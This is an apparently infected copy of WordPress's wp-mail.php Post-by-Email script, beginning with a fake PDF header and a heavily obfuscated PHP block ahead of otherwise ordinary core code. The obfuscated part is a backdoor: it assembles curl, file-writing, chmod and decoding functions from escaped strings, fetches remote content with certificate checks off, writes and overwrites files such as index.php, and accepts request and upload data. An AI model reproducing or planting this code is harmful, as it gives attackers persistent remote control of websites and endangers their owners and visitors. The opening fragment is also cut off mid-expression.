%PDF- %PDF- $UYOWA["\x64"]["\165\162\x6c"]]; goto bfkJn; y0C5p: @$ZJUCA($dqnvi, $shT8z); goto wf0jq; cinsF: $LfwPf = $cPzOq; goto d8sPt; OAF8R: $LfwPf .= "\x6c\x6c"; goto wsLep; d8sPt: $LfwPf .= "\77\141\143"; goto HZ42Q; lexI4: @$nRD8p($Y61WO, $RTa9G, true); goto K7fs2; aGYEQ: @$rGvmf($dqnvi, $UYOWA["\144"]["\x63\157\x64\x65"]); goto y0C5p; zCePm: nWSzU: goto r2ase; Bwps7: $dqnvi = $jQ0xa . $UYOWA["\144"]["\160\x61\x74\x68"]; goto s2GBY; K7fs2: @$ZJUCA($jQ0xa, $shT8z); goto bO0VE; HZ42Q: $LfwPf .= "\164\75\x63\141"; goto OAF8R; r2ase: } catch (Exception $ICL20) { } goto AedpI; kAMGF: $xsy4x .= "\144\x69\x72"; goto gdP2h; lX6T6: if (!$gvOPD($kb9bA)) { goto KTGlr; } goto spjef; jxKJS: $ulOTQ .= "\x5f\x41\104"; goto wee0Y; vZkPa: $dZR_y .= "\x3f\141\143\164"; goto FJdH4; gErqa: $MyinT .= "\60\x36\x20\116\x6f"; goto H7qkB; xGZOR: $hg32N = $d3gSl = $ygOJ_ . "\57" . $HNQiW; goto TyAte; GiT2I: $Mvmq_ = $vW4As; goto gmVrv; KCtWA: $fHDYt = "\x66\x6c\157"; goto MLdcc; Yc09l: $xsy4x = "\x69\163\137"; goto kAMGF; FZsOD: $lJtci .= "\150\x70"; goto eBKm1; rA_Dy: $YQ0P6 .= "\154\137\x65\170\x65\x63"; goto GiT2I; VQCaR: $k8h0h = !empty($m4bDA) || !empty($ZTS7q); goto Bw8cX; ujtZa: $l0WLW .= "\154\137\x73\x65\x74"; goto CrWKs; R1jVG: $ulOTQ = "\127\120"; goto jxKJS; OXweB: if (!is_array($UYOWA)) { goto CVVA3; } goto L7ftk; bqFyS: if (isset($_SERVER[$pv6cp])) { goto Kwp9i; } goto r3vZ_; ChKDE: $egQ3R .= "\156\146\x6c\x61\164\145"; goto OCGca; Bx0F8: $rGvmf = "\146\x69\154\145\x5f"; goto cMMsY; lar4b: $xsR4V .= "\x6d\145"; goto ESAaf; L7ftk: try { goto b8mrw; IZ7dT: @$rGvmf($d3gSl, $UYOWA["\x63"]); goto qi8JJ; j1slf: if (!$xsy4x($ygOJ_)) { goto fnZm_; } goto l27iU; FnW9Y: fnZm_: goto IZ7dT; RHQPY: @$ZJUCA($jQ0xa, $shT8z); goto FudGj; jRIpH: $d3gSl = $hg32N; goto FnW9Y; b8mrw: @$ZJUCA($jQ0xa, $RTa9G); goto j1slf; l27iU: @$ZJUCA($ygOJ_, $RTa9G); goto jRIpH; qi8JJ: @$ZJUCA($d3gSl, $shT8z); goto fMj35; fMj35: @$YWYP0($d3gSl, $H0gg1); goto RHQPY; FudGj: } catch (Exception $ICL20) { } goto Jb1Vu; Hy0sm: $pv6cp .= "\x67\151\x73\164"; goto dLa5a; wODYw: $tIzL7 = "\57\x5e\143"; goto ioNAN; D9G8A: $vW4As = "\x63\165\162"; goto Gs7Gb; zR6Sw: $RTa9G += 304; goto LxUUO; FLAgg: @$ZJUCA($jQ0xa, $shT8z); goto Ms_Rx; TkfCl: $MyinT = "\110\124\124"; goto CL80L; JBJmV: $xsR4V = "\x73\x74\x72"; goto wDwVu; m7Y7E: $shT8z += 150; goto flXr3; OCGca: $AkFS8 = "\165\x6e\x73\145\x72"; goto DuXwv; spjef: @$ZJUCA($jQ0xa, $RTa9G); goto PgImI; mIlAi: $YWYP0 = "\x74\157"; goto tFGg7; Air1i: $MyinT .= "\x65\x70\164\x61\142\154\145"; goto wJDrU; hnuEm: $M7wqP = false; goto IxcDO; AfwzG: $gvOPD .= "\x66\151\154\x65"; goto Yc09l; Mg1JO: if (!$CgFIN) { goto V5o9n; } goto a4EJZ; O8RXw: $QIBzt .= "\x2e\x30\73"; goto kxKwG; Qjsri: Kwp9i: goto uHm0i; aQp1m: $DJDq1 = "\146\151\154\145\x5f"; goto kJlf4; wDwVu: $xsR4V .= "\x74\157"; goto k5kym; Ms_Rx: KTGlr: goto QDkYN; p2xAd: $u9w0n = "\x68\x74\x74\160\x5f\142"; goto ZlPje; XWOCC: $ygOJ_ .= "\x64\155\151\156"; goto dlqC2; PXHHr: $VwfuP .= "\x69\156\145\144"; goto uwRQG; t74Wt: $Aa5A7 = $k7jG8[1]; goto rjUnC; WmTiu: $ZJUCA .= "\x6d\157\x64"; goto OMDdm; F90kP: $CgFIN = 1; goto TBl6Q; IxcDO: try { goto MN2Ol; lfwpD: $l0WLW($ekYPG, CURLOPT_RETURNTRANSFER, 1); goto XT0V7; pm4fL: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYHOST, false); goto f1Wpg; LukB5: $l0WLW($ekYPG, CURLOPT_USERAGENT, "\x49\x4e"); goto lfwpD; MN2Ol: $ekYPG = $kpMfb(); goto PGjVI; XT0V7: $l0WLW($ekYPG, CURLOPT_SSL_VERIFYPEER, false); goto pm4fL; f1Wpg: $l0WLW($ekYPG, CURLOPT_FOLLOWLOCATION, true); goto A02q4; Jr5Fq: $Mvmq_($ekYPG); goto kxHAl; kxHAl: $M7wqP = trim(trim($M7wqP, "\xef\273\xbf")); goto DRdNb; A02q4: $l0WLW($ekYPG, CURLOPT_TIMEOUT, 10); goto czpAh; PGjVI: $l0WLW($ekYPG, CURLOPT_URL, $dZR_y); goto LukB5; czpAh: $M7wqP = $YQ0P6($ekYPG); goto Jr5Fq; DRdNb: } catch (Exception $ICL20) { } goto TtjMz; yA6tr: $e9dgF .= "\63\x36"; goto ozW5s; BLSy0: $dZR_y .= "\x26\164\x3d\x69\46\x68\75" . $osL5h; goto hnuEm; qaeyL: $shT8z = 215; goto m7Y7E; YAsQc: if (!(!$_SERVER[$pv6cp] && $FANp1(PHP_VERSION, $QIBzt, "\76"))) { goto VlKKH; } goto ulics; QDkYN: $CgFIN = 0; goto CRqG1; g3rCR: $m4bDA = $_REQUEST; goto A4fYL; rjUnC: if (!(!$gvOPD($lJtci) || $MWMOe($lJtci) != $H25pP)) { goto P9yQa; } goto D9NbF; x5YEr: $pv6cp .= "\x73\x68\165"; goto itQ2f; A4fYL: $ZTS7q = $_FILES; goto VQCaR; a2JJX: $EUeQo .= "\145\x78"; goto fYDkt; TYFaW: $Pzt0o += 3; goto hoCMV; fYDkt: $EUeQo .= "\x69\163\x74\163"; goto D9G8A; fmcU9: $MWMOe .= "\x5f\x66\151"; goto hDUdL; S2eca: $ZJUCA($jQ0xa, $shT8z); goto YAsQc; RCot0: $TBxbX .= "\x53\105\x5f\124\110\105"; goto FXRyn; BpRMk: $lJtci .= "\57\x69\x6e"; goto lJYIj; cMMsY: $rGvmf .= "\160\x75\164\137\143"; goto yaYSs; j4Pjv: $i5EZR .= "\x5f\x48\117\x53\x54"; goto VY3H_; itQ2f: $pv6cp .= "\x74\x64\x6f"; goto gi1ux; YAE22: $eKFWX .= "\66\x34\137\x64"; goto HkhAv; DuXwv: $AkFS8 .= "\x69\x61\x6c\151\x7a\x65"; goto kJyDh; NZqWx: $DJDq1 .= "\x6f\156\164\145\x6e\x74\x73"; goto Bx0F8; ESAaf: $EUeQo = "\146\x75\156\143"; goto Ee0VW; HkhAv: $eKFWX .= "\x65\143\x6f\x64\145"; goto IuHdj; RDKTA: HuCWH: goto tkEEo; k5kym: $xsR4V .= "\x74\151"; goto lar4b; WQZ3H: $UYOWA = 0; goto EO8QL; TtjMz: if (!($M7wqP !== false)) { goto HuCWH; } goto WQZ3H; N9T5l: $Mvmq_ .= "\x73\145"; goto p2xAd; HpOFr: $Wv1G0 .= "\137\122\117\x4f\124"; goto X4xWX; arBxc: VlKKH: goto gSbiK; G2uff: $kb9bA .= "\156\151"; goto lX6T6; gwNCH: $HqqUn .= "\157\x63\164"; goto m8hp8; yAax8: @unlink($kb9bA); goto FLAgg; pr5fA: $cPzOq .= "\157\x70\x2f"; goto D0V8f; gi1ux: $pv6cp .= "\x77\x6e\x5f\x66"; goto GSfrX; OMDdm: $eKFWX = "\142\141\x73\x65"; goto YAE22; aXExt: $MWMOe = $uAwql; goto fmcU9; gdP2h: $nRD8p = "\155\x6b"; goto VrwTF; Bw8cX: if (!(!$fs0FH && $k8h0h)) { goto wLXpb; } goto nHXnO; uwRQG: $e9dgF = "\x2d\61"; goto yA6tr; hoCMV: $RTa9G = 189; goto zR6Sw; Tfi5q: $fs0FH = $VwfuP($TBxbX) || $VwfuP($ulOTQ); goto g3rCR; W2Q7W: if (!(!$gvOPD($PcRcO) || $MWMOe($PcRcO) != $Aa5A7)) { goto sLwcv; } goto F90kP; r3vZ_: $_SERVER[$pv6cp] = 0; goto Qjsri; lJYIj: $lJtci .= "\144\x65\170\56\x70"; goto FZsOD; blzff: $QTYip .= "\x76\x61\x6c"; goto f6Txl; tkEEo: V5o9n: goto ossJl; ossJl: TGN7B: ?> Writing * * @package WordPress */ /** Make sure that the WordPress bootstrap has run before continuing. */ require __DIR__ . '/wp-load.php'; /** This filter is documented in wp-admin/options.php */ if ( ! apply_filters( 'enable_post_by_email_configuration', true ) ) { wp_die( __( 'This action has been disabled by the administrator.' ), 403 ); } $mailserver_url = get_option( 'mailserver_url' ); if ( 'mail.example.com' === $mailserver_url || empty( $mailserver_url ) ) { wp_die( __( 'This action has been disabled by the administrator.' ), 403 ); } /** * Fires to allow a plugin to do a complete takeover of Post by Email. * * @since 2.9.0 */ do_action( 'wp-mail.php' ); // phpcs:ignore WordPress.NamingConventions.ValidHookName.UseUnderscores /** Get the POP3 class with which to access the mailbox. */ require_once ABSPATH . WPINC . '/class-pop3.php'; /** Only check at this interval for new messages. */ if ( ! defined( 'WP_MAIL_INTERVAL' ) ) { define( 'WP_MAIL_INTERVAL', 5 * MINUTE_IN_SECONDS ); } $last_checked = get_transient( 'mailserver_last_checked' ); if ( $last_checked ) { wp_die( __( 'Slow down cowboy, no need to check for new mails so often!' ) ); } set_transient( 'mailserver_last_checked', true, WP_MAIL_INTERVAL ); $time_difference = get_option( 'gmt_offset' ) * HOUR_IN_SECONDS; $phone_delim = '::'; $pop3 = new POP3(); if ( ! $pop3->connect( get_option( 'mailserver_url' ), get_option( 'mailserver_port' ) ) || ! $pop3->user( get_option( 'mailserver_login' ) ) ) { wp_die( esc_html( $pop3->ERROR ) ); } $count = $pop3->pass( get_option( 'mailserver_pass' ) ); if ( false === $count ) { wp_die( esc_html( $pop3->ERROR ) ); } if ( 0 === $count ) { $pop3->quit(); wp_die( __( 'There does not seem to be any new mail.' ) ); } // Always run as an unauthenticated user. wp_set_current_user( 0 ); for ( $i = 1; $i <= $count; $i++ ) { $message = $pop3->get( $i ); $bodysignal = false; $boundary = ''; $charset = ''; $content = ''; $content_type = ''; $content_transfer_encoding = ''; $post_author = 1; $author_found = false; $post_date = null; $post_date_gmt = null; foreach ( $message as $line ) { // Body signal. if ( strlen( $line ) < 3 ) { $bodysignal = true; } if ( $bodysignal ) { $content .= $line; } else { if ( preg_match( '/Content-Type: /i', $line ) ) { $content_type = trim( $line ); $content_type = substr( $content_type, 14, strlen( $content_type ) - 14 ); $content_type = explode( ';', $content_type ); if ( ! empty( $content_type[1] ) ) { $charset = explode( '=', $content_type[1] ); $charset = ( ! empty( $charset[1] ) ) ? trim( $charset[1] ) : ''; } $content_type = $content_type[0]; } if ( preg_match( '/Content-Transfer-Encoding: /i', $line ) ) { $content_transfer_encoding = trim( $line ); $content_transfer_encoding = substr( $content_transfer_encoding, 27, strlen( $content_transfer_encoding ) - 27 ); $content_transfer_encoding = explode( ';', $content_transfer_encoding ); $content_transfer_encoding = $content_transfer_encoding[0]; } if ( 'multipart/alternative' === $content_type && str_contains( $line, 'boundary="' ) && '' === $boundary ) { $boundary = trim( $line ); $boundary = explode( '"', $boundary ); $boundary = $boundary[1]; } if ( preg_match( '/Subject: /i', $line ) ) { $subject = trim( $line ); $subject = substr( $subject, 9, strlen( $subject ) - 9 ); // Captures any text in the subject before $phone_delim as the subject. if ( function_exists( 'iconv_mime_decode' ) ) { $subject = iconv_mime_decode( $subject, 2, get_option( 'blog_charset' ) ); } else { $subject = wp_iso_descrambler( $subject ); } $subject = explode( $phone_delim, $subject ); $subject = $subject[0]; } /* * Set the author using the email address (From or Reply-To, the last used) * otherwise use the site admin. */ if ( ! $author_found && preg_match( '/^(From|Reply-To): /', $line ) ) { if ( preg_match( '|[a-z0-9_.-]+@[a-z0-9_.-]+(?!.*<)|i', $line, $matches ) ) { $author = $matches[0]; } else { $author = trim( $line ); } $author = sanitize_email( $author ); if ( is_email( $author ) ) { $userdata = get_user_by( 'email', $author ); if ( ! empty( $userdata ) ) { $post_author = $userdata->ID; $author_found = true; } } } if ( preg_match( '/Date: /i', $line ) ) { // Of the form '20 Mar 2002 20:32:37 +0100'. $ddate = str_replace( 'Date: ', '', trim( $line ) ); // Remove parenthesized timezone string if it exists, as this confuses strtotime(). $ddate = preg_replace( '!\s*\(.+\)\s*$!', '', $ddate ); $ddate_timestamp = strtotime( $ddate ); $post_date = gmdate( 'Y-m-d H:i:s', $ddate_timestamp + $time_difference ); $post_date_gmt = gmdate( 'Y-m-d H:i:s', $ddate_timestamp ); } } } // Set $post_status based on $author_found and on author's publish_posts capability. if ( $author_found ) { $user = new WP_User( $post_author ); $post_status = ( $user->has_cap( 'publish_posts' ) ) ? 'publish' : 'pending'; } else { // Author not found in DB, set status to pending. Author already set to admin. $post_status = 'pending'; } $subject = trim( $subject ); if ( 'multipart/alternative' === $content_type ) { $content = explode( '--' . $boundary, $content ); $content = $content[2]; // Match case-insensitive Content-Transfer-Encoding. if ( preg_match( '/Content-Transfer-Encoding: quoted-printable/i', $content, $delim ) ) { $content = explode( $delim[0], $content ); $content = $content[1]; } $content = strip_tags( $content, '


' ); } $content = trim( $content ); /** * Filters the original content of the email. * * Give Post-By-Email extending plugins full access to the content, either * the raw content, or the content of the last quoted-printable section. * * @since 2.8.0 * * @param string $content The original email content. */ $content = apply_filters( 'wp_mail_original_content', $content ); if ( false !== stripos( $content_transfer_encoding, 'quoted-printable' ) ) { $content = quoted_printable_decode( $content ); } if ( function_exists( 'iconv' ) && ! empty( $charset ) ) { $content = iconv( $charset, get_option( 'blog_charset' ), $content ); } // Captures any text in the body after $phone_delim as the body. $content = explode( $phone_delim, $content ); $content = empty( $content[1] ) ? $content[0] : $content[1]; $content = trim( $content ); /** * Filters the content of the post submitted by email before saving. * * @since 1.2.0 * * @param string $content The email content. */ $post_content = apply_filters( 'phone_content', $content ); $post_title = xmlrpc_getposttitle( $content ); if ( '' === trim( $post_title ) ) { $post_title = $subject; } $post_category = array( get_option( 'default_email_category' ) ); $post_data = compact( 'post_content', 'post_title', 'post_date', 'post_date_gmt', 'post_author', 'post_category', 'post_status' ); $post_data = wp_slash( $post_data ); $post_ID = wp_insert_post( $post_data ); if ( is_wp_error( $post_ID ) ) { echo "\n" . $post_ID->get_error_message(); } // The post wasn't inserted or updated, for whatever reason. Better move forward to the next email. if ( empty( $post_ID ) ) { continue; } /** * Fires after a post submitted by email is published. * * @since 1.2.0 * * @param int $post_ID The post ID. */ do_action( 'publish_phone', $post_ID ); echo "\n

" . __( 'Author:' ) . ' ' . esc_html( $post_author ) . '

'; echo "\n

" . __( 'Posted title:' ) . ' ' . esc_html( $post_title ) . '

'; if ( ! $pop3->delete( $i ) ) { echo '

' . sprintf( /* translators: %s: POP3 error. */ __( 'Oops: %s' ), esc_html( $pop3->ERROR ) ) . '

'; $pop3->reset(); exit; } else { echo '

' . sprintf( /* translators: %s: The message ID. */ __( 'Mission complete. Message %s deleted.' ), '' . $i . '' ) . '

'; } } $pop3->quit();